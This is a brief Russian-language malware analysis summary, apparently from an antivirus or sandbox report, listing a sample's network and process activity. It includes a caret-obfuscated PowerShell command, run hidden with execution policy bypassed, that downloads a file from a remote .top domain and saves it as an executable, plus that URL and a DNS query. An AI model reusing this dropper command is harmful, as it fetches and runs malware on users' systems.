Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oWer^ShEll^.^ExE ^-exECutiON^PoL^i^CY ^BYpaSs^ -^NO^Pr^o^fiL^e -w^I^N^DO^W^sTY^Le HId^D^e^n ^(^N^eW^-^Ob^jEct^ ^SyStEM.N^et.^weBcL^ieNT^).d^Ownl^O^A^dfI^le^('http://toagoore...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "p^oWer^ShEll^.^ExE ^-exECutiON^PoL^i^CY ^BYpaSs^ -^NO^Pr^o^fiL^e -w^I^N^DO^W^sTY^Le HId^D^e^n ^(^N^eW^-^Ob^jEct^ ^SyStEM.N^et.^weBcL^ieNT^).d^Ownl^O^A^dfI^le^('http://toagoore...' (со скрытым окном)